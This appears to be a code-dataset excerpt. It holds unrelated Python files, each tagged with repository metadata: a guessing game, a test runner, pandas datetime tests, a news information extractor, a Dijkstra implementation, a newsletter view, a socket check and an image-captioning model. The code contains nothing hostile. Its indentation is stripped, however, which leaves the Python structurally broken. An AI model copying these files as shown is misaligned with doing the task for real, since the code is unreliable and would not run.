print(f"Ganaste el numero era {number}")
elif respuesta>number:
print(f"Te pasaste {respuesta}")
else:
print(f"Aun te falta {respuesta}")
def computerGuess():
bandera=False
minimo=0
maximo=1000
number=random.randrange(minimo,maximo)
while(bandera ==False):
print(number)
respuesta=input("Este es tu numero si , no: ").lower()
if respuesta=="no":
opc=input("Es mayor o menor: ").lower()
if opc=="menor":
maximo=number
nuenum=random.randrange(minimo,maximo)
number=nuenum
else:
minimo=number
nuenum=random.randrange(minimo,maximo)
number=nuenum
else:
bandera=True
print("Numero")
computerGuess() | KabanBot/Guessgame | main.py | main.py | py | 1,142 | python | es | code | 0 | github-code | 90 |
3175221947 | import sys
import subprocess
import glob2
def run_command(_command, _output):
""" run_command """
print("Run command: " + " ".join(_command))
_output.write("Run command: " + " ".join(_command) + "\n")
with subprocess.Popen(
_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False
) as _proc:
_returncode = _proc.poll()
while _returncode is None:
_returncode = _proc.poll()
_line = _proc.stdout.readline()
if _line:
_line = _line.decode("utf-8").strip()
print(_line)
_output.write(_line + "\n")
while _line:
_line = _proc.stdout.readline()
if _line:
_line = _line.decode("utf-8").strip()
print(_line)
_output.write(_line + "\n")
else:
break
if _returncode != 0:
print("ERROR: returncode " + str(_returncode))
_output.write("ERROR: returncode " + str(_returncode) + "\n")
sys.exit(_returncode)
return
sys.exit("Could not start process")
if __name__ == "__main__":
with open('result_tests.txt', 'w') as _output:
try:
command = [
'python3', '-m', 'pylint',
'--rcfile=.pylintrc',
]
command.extend(glob2.glob("*.py"))
run_command(command, _output)
run_command([
'python3', '-m', 'pytest',
'-rAs', '-c', 'env-travis.ini'
], _output)
print('\n\n\nlook result_tests.txt')
finally:
print("finally")
| freehackquest/fhq-server | tests/server-api-tests/run_tests.py | run_tests.py | py | 1,703 | python | en | code | 35 | github-code | 90 |
34870649900 | import numpy as np
import pytest
from pandas._libs import iNaT
from pandas.core.dtypes.dtypes import DatetimeTZDtype
import pandas as pd
import pandas._testing as tm
from pandas.core.arrays import DatetimeArray
class TestDatetimeArrayConstructor:
def test_from_sequence_invalid_type(self):
mi = pd.MultiIndex.from_product([np.arange(5), np.arange(5)])
with pytest.raises(TypeError, match="Cannot create a DatetimeArray"):
DatetimeArray._from_sequence(mi)
def test_only_1dim_accepted(self):
arr = np.array([0, 1, 2, 3], dtype="M8[h]").astype("M8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
DatetimeArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
DatetimeArray(arr[[0]].squeeze())
def test_freq_validation(self):
# GH#24623 check that invalid instances cannot be created with the
# public constructor
arr = np.arange(5, dtype=np.int64) * 3600 * 10**9
msg = (
"Inferred frequency h from passed values does not "
"conform to passed frequency W-SUN"
)
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, freq="W")
@pytest.mark.parametrize(
"meth",
[
DatetimeArray._from_sequence,
pd.to_datetime,
pd.DatetimeIndex,
],
)
def test_mixing_naive_tzaware_raises(self, meth):
# GH#24569
arr = np.array([pd.Timestamp("2000"), pd.Timestamp("2000", tz="CET")])
msg = (
"Cannot mix tz-aware with tz-naive values|"
"Tz-aware datetime.datetime cannot be converted "
"to datetime64 unless utc=True"
)
for obj in [arr, arr[::-1]]:
# check that we raise regardless of whether naive is found
# before aware or vice-versa
with pytest.raises(ValueError, match=msg):
meth(obj)
def test_from_pandas_array(self):
arr = pd.array(np.arange(5, dtype=np.int64)) * 3600 * 10**9
result = DatetimeArray._from_sequence(arr)._with_freq("infer")
expected = pd.date_range("1970-01-01", periods=5, freq="h")._data
tm.assert_datetime_array_equal(result, expected)
def test_mismatched_timezone_raises(self):
arr = DatetimeArray(
np.array(["2000-01-01T06:00:00"], dtype="M8[ns]"),
dtype=DatetimeTZDtype(tz="US/Central"),
)
dtype = DatetimeTZDtype(tz="US/Eastern")
msg = r"dtype=datetime64\[ns.*\] does not match data dtype datetime64\[ns.*\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr, dtype=dtype)
# also with mismatched tzawareness
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr, dtype=np.dtype("M8[ns]"))
with pytest.raises(TypeError, match=msg):
DatetimeArray(arr.tz_localize(None), dtype=arr.dtype)
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
DatetimeArray([1, 2, 3])
def test_bool_dtype_raises(self):
arr = np.array([1, 2, 3], dtype="bool")
msg = "Unexpected value for 'dtype': 'bool'. Must be"
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr)
msg = r"dtype bool cannot be converted to datetime64\[ns\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray._from_sequence(arr)
with pytest.raises(TypeError, match=msg):
pd.DatetimeIndex(arr)
with pytest.raises(TypeError, match=msg):
pd.to_datetime(arr)
def test_incorrect_dtype_raises(self):
with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="m8[s]")
with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="M8[D]")
def test_mismatched_values_dtype_units(self):
arr = np.array([1, 2, 3], dtype="M8[s]")
dtype = np.dtype("M8[ns]")
msg = "Values resolution does not match dtype."
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, dtype=dtype)
dtype2 = DatetimeTZDtype(tz="UTC", unit="ns")
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, dtype=dtype2)
def test_freq_infer_raises(self):
with pytest.raises(ValueError, match="Frequency inference"):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), freq="infer")
def test_copy(self):
data = np.array([1, 2, 3], dtype="M8[ns]")
arr = DatetimeArray(data, copy=False)
assert arr._ndarray is data
arr = DatetimeArray(data, copy=True)
assert arr._ndarray is not data
@pytest.mark.parametrize("unit", ["s", "ms", "us", "ns"])
def test_numpy_datetime_unit(self, unit):
data = np.array([1, 2, 3], dtype=f"M8[{unit}]")
arr = DatetimeArray(data)
assert arr.unit == unit
assert arr[0].unit == unit
class TestSequenceToDT64NS:
def test_tz_dtype_mismatch_raises(self):
arr = DatetimeArray._from_sequence(
["2000"], dtype=DatetimeTZDtype(tz="US/Central")
)
with pytest.raises(TypeError, match="data is already tz-aware"):
DatetimeArray._from_sequence(arr, dtype=DatetimeTZDtype(tz="UTC"))
def test_tz_dtype_matches(self):
dtype = DatetimeTZDtype(tz="US/Central")
arr = DatetimeArray._from_sequence(["2000"], dtype=dtype)
result = DatetimeArray._from_sequence(arr, dtype=dtype)
tm.assert_equal(arr, result)
@pytest.mark.parametrize("order", ["F", "C"])
def test_2d(self, order):
dti = pd.date_range("2016-01-01", periods=6, tz="US/Pacific")
arr = np.array(dti, dtype=object).reshape(3, 2)
if order == "F":
arr = arr.T
res = DatetimeArray._from_sequence(arr)
expected = DatetimeArray._from_sequence(arr.ravel()).reshape(arr.shape)
tm.assert_datetime_array_equal(res, expected)
# ----------------------------------------------------------------------------
# Arrow interaction
EXTREME_VALUES = [0, 123456789, None, iNaT, 2**63 - 1, -(2**63) + 1]
FINE_TO_COARSE_SAFE = [123_000_000_000, None, -123_000_000_000]
COARSE_TO_FINE_SAFE = [123, None, -123]
@pytest.mark.parametrize(
("pa_unit", "pd_unit", "pa_tz", "pd_tz", "data"),
[
("s", "s", "UTC", "UTC", EXTREME_VALUES),
("ms", "ms", "UTC", "Europe/Berlin", EXTREME_VALUES),
("us", "us", "US/Eastern", "UTC", EXTREME_VALUES),
("ns", "ns", "US/Central", "Asia/Kolkata", EXTREME_VALUES),
("ns", "s", "UTC", "UTC", FINE_TO_COARSE_SAFE),
("us", "ms", "UTC", "Europe/Berlin", FINE_TO_COARSE_SAFE),
("ms", "us", "US/Eastern", "UTC", COARSE_TO_FINE_SAFE),
("s", "ns", "US/Central", "Asia/Kolkata", COARSE_TO_FINE_SAFE),
],
)
def test_from_arrowtest_from_arrow_with_different_units_and_timezones_with_(
pa_unit, pd_unit, pa_tz, pd_tz, data
):
pa = pytest.importorskip("pyarrow")
pa_type = pa.timestamp(pa_unit, tz=pa_tz)
arr = pa.array(data, type=pa_type)
dtype = DatetimeTZDtype(unit=pd_unit, tz=pd_tz)
result = dtype.__from_arrow__(arr)
expected = DatetimeArray(
np.array(data, dtype=f"datetime64[{pa_unit}]").astype(f"datetime64[{pd_unit}]"),
dtype=dtype,
)
tm.assert_extension_array_equal(result, expected)
result = dtype.__from_arrow__(pa.chunked_array([arr]))
tm.assert_extension_array_equal(result, expected)
@pytest.mark.parametrize(
("unit", "tz"),
[
("s", "UTC"),
("ms", "Europe/Berlin"),
("us", "US/Eastern"),
("ns", "Asia/Kolkata"),
("ns", "UTC"),
],
)
def test_from_arrow_from_empty(unit, tz):
pa = pytest.importorskip("pyarrow")
data = []
arr = pa.array(data)
dtype = DatetimeTZDtype(unit=unit, tz=tz)
result = dtype.__from_arrow__(arr)
expected = DatetimeArray(np.array(data, dtype=f"datetime64[{unit}]"))
expected = expected.tz_localize(tz=tz)
tm.assert_extension_array_equal(result, expected)
result = dtype.__from_arrow__(pa.chunked_array([arr]))
tm.assert_extension_array_equal(result, expected)
def test_from_arrow_from_integers():
pa = pytest.importorskip("pyarrow")
data = [0, 123456789, None, 2**63 - 1, iNaT, -123456789]
arr = pa.array(data)
dtype = DatetimeTZDtype(unit="ns", tz="UTC")
result = dtype.__from_arrow__(arr)
expected = DatetimeArray(np.array(data, dtype="datetime64[ns]"))
expected = expected.tz_localize("UTC")
tm.assert_extension_array_equal(result, expected)
result = dtype.__from_arrow__(pa.chunked_array([arr]))
tm.assert_extension_array_equal(result, expected)
| pandas-dev/pandas | pandas/tests/arrays/datetimes/test_constructors.py | test_constructors.py | py | 9,234 | python | en | code | 40,398 | github-code | 90 |
11058038380 | from itertools import islice
import os
from os import listdir
from os.path import isfile, join
import re
import shutil
#path = '/home/neha/Desktop/ISI_final/test'
relationPath = '../../Data/Relations'
article_path='../../../2_Event_Filtering/Data/LDA_Filtered_Articles'
taggedArticlePath='../../Data/Tagged_Protest_Articles'
extracted_info_path = '../../Data/Extracted_information'
fileList=[]
window_size=7
# Create the output folder if not exists
if os.path.isdir(extracted_info_path):
shutil.rmtree(extracted_info_path)
os.makedirs(extracted_info_path)
########################################################################################################
#article_path='/home/neha/Desktop/info/article'
#get the published date of each article
articleList=[]
titleDict={}
published_date={}
for article in os.listdir(article_path):
articleList.append(article)
for article in articleList:
with open(os.path.join(article_path,article), 'rU') as fp:
for i, line in enumerate(fp):
if i == 2:
published_date[article]=line[:len(line)-2]
if i == 1:
titleDict[article]=line
###################################################################################################
def get_count(word_count_tuple):
"""Returns the count from a dict word/count tuple -- used for custom sort."""
return word_count_tuple[1]
##########################################################################################################
def getRelID(relation):
relID=relation.split('(')
relID=int(relID[0])
return relID
############################################################################################################
def window(seq, n):
"Returns a sliding window (of width n) over data from the iterable"
" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... "
it = iter(seq)
result = tuple(islice(it, n))
if len(result) == n:
yield result
for elem in it:
result = result[1:] + (elem,)
yield result
if __name__=="__main__":
for filename in os.listdir(relationPath):
fileList.append(filename)
keywordList=['protest','protesting','protested','demonstartion','agitation','dharna','bandh','rally','rallies','gherao','activist','march towards','on strike']
tagList=['/PERSON','/LOCATION','/DATE','/ORGANIZTION','/person','/location','/date','/organization']
##############################################################################
#iterate over all the files
for filename in fileList:
print(filename)
print(titleDict[filename])
################################################################################################
#read file
with open(os.path.join(relationPath,filename), 'rU') as f:
dictPerson={}
dictLocation={}
dictOrganization={}
dictDate={}
relevanceDict={}
##################################################################################################
#parse the title
with open(os.path.join(taggedArticlePath,filename), 'rU') as fp:
i=0
for i, line in enumerate(fp):
if i==2:
#print line+'\n'
wordList=line.split(' ')
k=-1
for item in wordList:
k=k+1
if (k<len(wordList)) and ('/LOCATION' in wordList[k] or '/location' in wordList[k]):
if (k+1<len(wordList)) and ('/LOCATION' in wordList[k+1] or '/location' in wordList[k+1]):
first=wordList[k]
first=first[:-9]
second=wordList[k+1]
second=second[:-9]
location=first+" "+second
k=k+1
else:
location=wordList[k]
location=location[:-9]
if location not in dictLocation:
dictLocation[location.lower()]=1
if (k<len(wordList)) and ('/PERSON' in wordList[k] or '/person' in wordList[k]):
if (k+1<len(wordList)) and ('/person' in wordList[k+1] or '/person' in wordList[k+1]):
if (k+2<len(wordList)) and ('/person' in wordList[k+2] or '/person' in wordList[k+2]):
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
third=wordList[k+2]
third=third[:-7]
person=first+" "+second+" "+third
k=k+2
else:
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
person=first+" "+second
k=k+1
else:
person=wordList[k]
person=person[:-7]
if person not in dictPerson:
dictPerson[person.lower()]=1
if (k<len(wordList)) and ('/DATE' in wordList[k] or '/date' in wordList[k]):
if (k+1<len(wordList)) and ('/DATE' in wordList[k+1] or '/date' in wordList[k+1]):
first=wordList[k]
first=first[:-5]
second=wordList[k+1]
second=second[:-5]
date=first+" "+second
k=k+1
else:
date=wordList[k]
date=date[:-5]
if date not in dictDate:
dictDate[date.lower()]=1
if (k<len(wordList)) and ('/ORGANIZATION' in wordList[k] or '/oraganization' in wordList[k]):
if (k+1<len(wordList)) and ('/ORGANIZATION' in wordList[k+1] or '/organization' in wordList[k+1]):
first=wordList[k]
first=first[:-13]
second=wordList[k+1]
second=second[:-13]
organization=first+" "+second
k=k+1
else:
organization=wordList[k]
organization=organization[:-13]
if organization not in dictOrganization:
dictOrganization[organization.lower()]=1
##################################################################################################
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
#prevWindowProcessedFlag=[0,0,0,0,0]
##################################################################################################
#iterarte over window
for w in window(content,window_size):
#check for key phrase in each window and then check for the tags in each realtion extract info and mark relevant and processed
# currWindowProcessedFlag=[0,0,0,0,0]
stringWindow=str(w)
if any(keyword in stringWindow for keyword in keywordList):
####################################################################################################
#iterate over all the relation of the window
i=-1
relevanceFlag=0
for relation in w:
person=""
location=""
date=""
purpose=""
organization=""
flag=-1
relevanceFlag=0
i=i+1
stringRel=str(relation)
#relID=getRelID(stringRel)
stringRel=stringRel[:-1]
stringRel=re.sub(r'.*\(', '', stringRel)
#print stringRel
#set the flags and write relevence info into corresponding file
if any(tag in stringRel for tag in tagList):
#set relevance flag of this relation
if any(keyword in stringRel for keyword in keywordList):
relevanceFlag=1
#print 'found relevant'
#if not processed already process this time
#if prevWindowProcessedFlag[i] == 0:
#extract info
#extractInfo(stringRel)
###########################################################################################################
words=stringRel.split('#')
string=words[0]+" "+words[1]+" "+words[2]
wordList=string.split(' ')
k=-1
for item in wordList:
k=k+1
if (k<len(wordList)) and ('/LOCATION' in wordList[k] or '/location' in wordList[k]):
if (k+1<len(wordList)) and ('/LOCATION' in wordList[k+1] or '/location' in wordList[k+1]):
first=wordList[k]
first=first[:-9]
second=wordList[k+1]
second=second[:-9]
location=first+" "+second
k=k+1
else:
location=wordList[k]
location=location[:-9]
if location not in dictLocation:
dictLocation[location.lower()]=1
if (k<len(wordList)) and ('/PERSON' in wordList[k] or '/person' in wordList[k]):
if (k+1<len(wordList)) and ('/person' in wordList[k+1] or '/person' in wordList[k+1]):
if (k+2<len(wordList)) and ('/person' in wordList[k+2] or '/person' in wordList[k+2]):
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
third=wordList[k+2]
third=third[:-7]
person=first+" "+second+" "+third
k=k+2
else:
first=wordList[k]
first=first[:-7]
second=wordList[k+1]
second=second[:-7]
person=first+" "+second
k=k+1
else:
person=wordList[k]
person=person[:-7]
if person not in dictPerson:
dictPerson[person.lower()]=1
if (k<len(wordList)) and ('/DATE' in wordList[k] or '/date' in wordList[k]):
if (k+1<len(wordList)) and ('/DATE' in wordList[k+1] or '/date' in wordList[k+1]):
first=wordList[k]
first=first[:-5]
second=wordList[k+1]
second=second[:-5]
date=first+" "+second
k=k+1
else:
date=wordList[k]
date=date[:-5]
if date not in dictDate:
dictDate[date.lower()]=1
if (k<len(wordList)) and ('/ORGANIZATION' in wordList[k] or '/oraganization' in wordList[k]):
if (k+1<len(wordList)) and ('/ORGANIZATION' in wordList[k+1] or '/organization' in wordList[k+1]):
first=wordList[k]
first=first[:-13]
second=wordList[k+1]
second=second[:-13]
organization=first+" "+second
k=k+1
else:
organization=wordList[k]
organization=organization[:-13]
if organization not in dictOrganization:
dictOrganization[organization.lower()]=1
###########################################################################################################
#mark process flag in currWindowProcessedFlag
#currWindowProcessedFlag[i]=1
#write into file relevance info
#relevanceDict[relID]=relevanceFlag
#prevWindowProcessedFlag=currWindowProcessedFlag[:]
#print dictPerson
#print dictLocation
#print dictOrganization
#print dictDate
completeName = os.path.join(extracted_info_path, filename)
file1 = open(completeName, "w")
#write published date and title
file1.write(published_date[filename])
file1.write('\n'+titleDict[filename])
#write person
if any(dictPerson):
items = sorted(dictPerson.items(), key=get_count, reverse=True)
firstWordFlag=1
for item in items[:5]:
if firstWordFlag == 1:
file1.write(item[0])
firstWordFlag=0
else:
file1.write(', '+item[0])
else:
file1.write('None') # '\n' not required as title string end with \n
#write date
if any(dictDate):
file1.write('\n')
firstWordFlag=1
for word,freq in dictDate.items():
if firstWordFlag == 1:
file1.write(word)
firstWordFlag=0
else:
file1.write(', '+word)
else:
file1.write('\n'+published_date[filename])
#write organization
if any(dictOrganization):
file1.write('\n')
items=[]
items = sorted(dictOrganization.items(), key=get_count, reverse=True)
firstWordFlag=1
for item in items[:5]:
if firstWordFlag == 1:
file1.write(item[0])
firstWordFlag=0
else:
file1.write(', '+item[0])
else:
file1.write('\nNone')
#write location
if any(dictLocation):
file1.write('\n')
firstWordFlag=1
for word,freq in dictLocation.items():
if firstWordFlag == 1:
file1.write(word)
firstWordFlag=0
else:
file1.write(', '+word)
else:
file1.write('\nNone')
file1.close()
| neeleshkshukla/PlannedEventForecasting | 3_Information_Extraction/Code/Python/informationExtraction.py | informationExtraction.py | py | 13,329 | python | en | code | 0 | github-code | 90 |
36173898483 | import sys
import os.path
class colaPrioridad():
def __init__(self):
self.minHeap = MinHeap()
def inserta(self,key,value):
self.minHeap.push(key,value)
def encuentraMin(self):
return self.minHeap.peek()
def borraMin(self):
temp = self.minHeap.pop()
def vacio(self):
return self.minHeap.esVacia()
def elimina(self,key):
self.minHeap.eliminaPorEtiqueta(key)
def minQ(self):
return self.minHeap.peek()
def decrementaLlave(self,key,value):
x = self.minHeap.encuentraValor(key)
if x == -1:#No encontro el valor, por lo tanto no se hace nada
return
#if value < self.minHeap[x][1]:
self.minHeap.cambioValor(x,value)
class MinHeap:
def __init__(self):
self.heap = [] #son del tipo ['etiqueta',distancia]
def esVacia(self):
if self.heap == []:
return True
return False
def getPadre(self, i):
return int((i-1)/2)
def getIzquierdo(self, i):
return 2*i+1
def getDerecho(self, i):
return 2*i+2
def tienePadre(self, i):
return self.getPadre(i) < len(self.heap)
def tieneIzquierdo(self, i):
return self.getIzquierdo(i) < len(self.heap)
def tieneDerecho(self, i):
return self.getDerecho(i) < len(self.heap)
def push(self, etiqueta,llave):
self.heap.append([etiqueta,llave])
self.heapify(len(self.heap) - 1)
def pop(self):
if self.esVacia():
return None
if len(self.heap) == 1:
temp = self.heap[0]
self.heap = []
return temp
temp = self.heap[0]
ultimo = len(self.heap) - 1
self.heap[0] = self.heap[ultimo]
del self.heap[ultimo]
self.heapifyPop(0)
return temp
def hijoMin(self,i):
derecho = self.getDerecho(i)
izquierdo = self.getIzquierdo(i)
tamanio = len(self.heap)
if derecho < tamanio and izquierdo < tamanio:
if self.heap[izquierdo][1] < self.heap[derecho][1]:
return izquierdo
else:
return derecho
elif derecho < tamanio and izquierdo >= tamanio:
return derecho
elif izquierdo < tamanio and derecho >= tamanio:
return izquierdo
else:#no tiene hijos
return -1
def heapifyPop(self,posicion):#[etiqueta,valor]
hijomin = self.hijoMin(posicion)
#posicion no tiene hijos, por lo tanto ya acaba
if hijomin == -1:
return
#tiene al menos un hijo
if self.heap[hijomin][1] < self.heap[posicion][1]:
self.heap[hijomin],self.heap[posicion] = self.heap[posicion],self.heap[hijomin]
self.heapifyPop(hijomin)
def peek(self):
if self.esVacia():
return None
return self.heap[0]
def heapify(self, i):
while(self.tienePadre(i) and self.heap[i][1] < self.heap[self.getPadre(i)][1]):
self.heap[i], self.heap[self.getPadre(i)] = self.heap[self.getPadre(i)], self.heap[i]
i = self.getPadre(i)
def imprimeHeap(self):
print(self.heap)
def encuentraValor(self,etiqueta):
for x in range(0,len(self.heap)):
if self.heap[x][0] == etiqueta:
return x
return -1
def eliminaPorEtiqueta(self,etiqueta):
x = self.encuentraValor(etiqueta)
self.heap[x],self.heap[-1] = self.heap[-1],self.heap[x]
del self.heap[-1]
if self.tienePadre(x):
if self.heap[x][1] < self.heap[self.getPadre(x)][1]:
self.heapify(x)
return
self.heapifyPop(x)
#Solo se considera cuando el valor es menor al presente en el heap
def cambioValor(self,posicion,valor):
self.heap[posicion][1] = valor
self.heapify(posicion)
def Dijkstra(inicio,tabla,vertices):
tabla[inicio][1] = 0
tabla[inicio][2] = True
tabla[inicio][3] = True
cola = colaPrioridad()
for x in vertices[inicio]:
cola.inserta(x[0],x[1])
tabla[x[0]][1] = x[1]
tabla[x[0]][0] = inicio
tabla[x[0]][2] = True
#cola.minHeap.imprimeHeap()
#print(tabla)
#i = 0
while not cola.vacio():
minimo = cola.encuentraMin()
cola.borraMin()
tabla[minimo[0]][3] = True
for x in vertices[minimo[0]]:
if tabla[x[0]][3] == False:#Es permanente? No, sigue aqui, Si, pasa al siguiente en vertices
if tabla[x[0]][2] == False:#Es false que ya haya visitado?
tabla[x[0]][0] = minimo[0]
tabla[x[0]][1] = minimo[1] + x[1]
tabla[x[0]][2] = True
cola.inserta(x[0],minimo[1] + x[1])
else:#Es True que ya haya sido visitado
if tabla[x[0]][1] > minimo[1] + x[1]:
cola.decrementaLlave(x[0],minimo[1] + x[1])
tabla[x[0]][1] = minimo[1] + x[1]
tabla[x[0]][0] = minimo[0]
#i = i + 1
#print(tabla)
return tabla
def auxiliarSalida(tabla):
temp_diccionario = {}
for i in tabla.keys():
temp_diccionario[i]=tabla[i][1]
for j in tabla.keys():
padre = tabla[j][0]
if padre != '':
tabla[j][1] = tabla[j][1] - temp_diccionario[padre]
def salida(tabla):
auxiliarSalida(tabla)
if not os.path.isfile('salida.txt'):#si no existe, crealo
f = open("salida.txt","x")
else:#existe, borra su informacion
f = open("salida.txt","w")
f.close()
f = open("salida.txt","w")
salida = ""
contador = 0
for i in tabla.keys():
if contador == 0:
salida = i
else:
salida = salida + "," + i
contador = contador + 1
salida = salida + "\n"
for j in tabla.keys(): #se agrega nodo, padre y valor [key,padre,valor] j,tabla[j][0],tabla[j][1]
if tabla[j][0] != '':#para el nodo principal o nodos desconectados, para que no aparezcan en el resultado final
salida = salida + j + "," + tabla[j][0] + "," + str(tabla[j][1]) + "\n"
f.write(salida)
f.close()
def main():
f = open(sys.argv[1],"r")
linea = f.readlines()
vertices = {}
tabla = {}
if linea == []:
salida(tabla)
return
numero = ""
contador_inicio = 0
inicio = ""
i = 0
while i < len(linea[0]):
if linea[0][i] == ',' or linea[0][i] == ' ' or linea[0][i] == '\n':
if contador_inicio == 0:
inicio = numero
vertices[numero] = []
tabla[numero] = ['',sys.maxsize,False,False]
numero = ""
i = i+1
contador_inicio = contador_inicio + 1
else:
numero = numero + linea[0][i]
i = i + 1
#print(tabla)
for i in range(1,len(linea)):
temp = linea[i]
j = 0
valor1 = ""
valor2 = ""
valor3 = ""
while temp[j] != ',':
valor1 = valor1 + temp[j]
j = j + 1
j = j + 1
while temp[j] != ',':
valor2 = valor2 + temp[j]
j = j + 1
j = j + 1
while temp[j] != '\n':
valor3 = valor3 + temp[j]
j = j + 1
#Agregamos al diccionario
valor3 = int(valor3)
vertices[valor1].append([valor2,valor3])
vertices[valor2].append([valor1,valor3])
#print(vertices)
f.close()
salida(Dijkstra(inicio,tabla,vertices))
#print(tabla)
#print(inicio)
#salida(tabla)
if __name__ == '__main__':
main()
#print(sys.maxsize)
| IsayDBS/Analisis_de_algoritmos | Practica4/Isay_Balderas/src/Main.py | Main.py | py | 7,761 | python | es | code | 0 | github-code | 90 |
41378532087 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf.urls import url
from .views import LicenseDetailView
urlpatterns = [
url(
r"^license/(?P<slug>[-\w]+)/$",
LicenseDetailView.as_view(),
name="alibrary-license-detail",
)
]
| digris/openbroadcast.org | website/apps/alibrary/urls_license.py | urls_license.py | py | 286 | python | en | code | 9 | github-code | 90 |
3994929588 | import sys
input = sys.stdin.readline
if __name__ == "__main__":
N = list(map(str, input().strip()))
room = [0 for _ in range(9)]
pack = [1, 1, 1, 1, 1, 1, 2, 1, 1]
for i in range(len(N)):
if N[i] == "9":
room[6] += 1
else:
room[int(N[i])] += 1
for i in range(1, 10):
temp = [i for _ in range(9)]
comp = [x * y for x, y in zip(temp, pack)]
flag = False
for j in range(9):
if comp[j] < room[j]:
flag = True
break
if flag == False:
print(i)
exit(0)
| WonyJeong/algorithm-study | WonyJeong/implementation/1475.py | 1475.py | py | 620 | python | en | code | 2 | github-code | 90 |
38396279645 | # Pyramid
import colander
import deform
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.httpexceptions import HTTPFound
# Websauna
from websauna.system.core import messages
from websauna.system.core.route import simple_route
from websauna.system.core.sitemap import include_in_sitemap
from websauna.system.core.utils import get_secrets
from websauna.system.form.schema import CSRFSchema
from websauna.system.http import Request
from .mailgun import Mailgun
class NewsletterSubscriptionSchema(CSRFSchema):
"""Newsletter subscription schema."""
email = colander.Schema(colander.String(), validator=colander.Email())
came_from = colander.Schema(colander.String(), validator=colander.url)
def subscribe_email(request: Request, email: str):
"""Subscribe an email address to our default mailing list.
Don't change existing subscription status.
Save form data from appstruct
"""
mailgun = Mailgun(request.registry)
secrets = get_secrets(request.registry)
address = secrets["mailgun.mailing_list"]
return mailgun.update_subscription(address, {
"address": email,
"email": email,
"upsert": "yes"
})
@simple_route("/subscribe-newsletter", route_name="subscribe_newsletter")
@include_in_sitemap(False)
def subscribe_newsletter(request: Request):
"""Newsletter Subscription view."""
schema = NewsletterSubscriptionSchema().bind(request=request)
form = deform.Form(schema)
# In case of validation error, we return the user to the form
came_from = request.referer or request.route_url('home')
if request.method != "POST":
return HTTPBadRequest("POST-only endpoint")
# User submitted this form
if 'subscribe' in request.POST:
try:
appstruct = form.validate(request.POST.items())
email = appstruct["email"]
came_from = appstruct["came_from"]
subscribe_email(request, email)
# Thank user and take them to the next page
msg = "<strong>{email}</strong> has been subscribed to the newsletter.".format(email=email)
msg_class = 'info'
messages.add(request, kind=msg_class, msg=msg, html=True)
except deform.ValidationFailure:
# Render a form version where errors are visible next to the fields,
# and the submitted values are posted back
msg = "Email was not valid."
msg_class = 'error'
messages.add(request, kind=msg_class, msg=msg)
return HTTPFound(came_from)
else:
# We don't know which control caused form submission
return HTTPBadRequest("Unknown form button pressed")
| websauna/websauna.newsletter | websauna/newsletter/views.py | views.py | py | 2,692 | python | en | code | 1 | github-code | 90 |
35504360257 | # Echo client program
import socket
import sys
#HOST = '70.186.140.93'
HOST = 'mber.pub.playdekgames.com' # The remote host
PORT = 9601
s = None
print( ' Connection test utility' )
print( '@ 2014 Mickey Kawick' )
print( 'address {0}:{1}'.format( HOST, PORT ) );
print( '................................' )
print( 'Connecting...' )
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
except socket.error as msg:
s.close()
s = None
continue
break
if s is None:
print( 'could not open socket' )
sys.exit(1)
else:
print( 'connection was fine' )
s.close()
print( '................................' )
print( 'execution complete...' ) | mkawick/tcp_testing | ErrorCheckingClient.py | ErrorCheckingClient.py | py | 901 | python | en | code | 0 | github-code | 90 |
2776972832 | import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
super(DecoderRNN, self).__init__()
self.embed = nn.Embedding(vocab_size, embed_size)
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True)
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embeddings = self.embed(captions)
# We drop off the last end word in the caption because feeding it to the lstm
# would be useless
tmpList = list(embeddings.size())
narrowVal = tmpList[1] - 1
embeddings = embeddings.narrow(1, 0, narrowVal)
features = features.unsqueeze(1)
embeddings = torch.cat((features, embeddings), 1)
hidden, output = self.lstm(embeddings)
outputs = self.linear(hidden)
return outputs
def sample(self, inputs, states=None, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
"""Generate captions for given image features using greedy search."""
sampled_ids = []
for i in range(20):
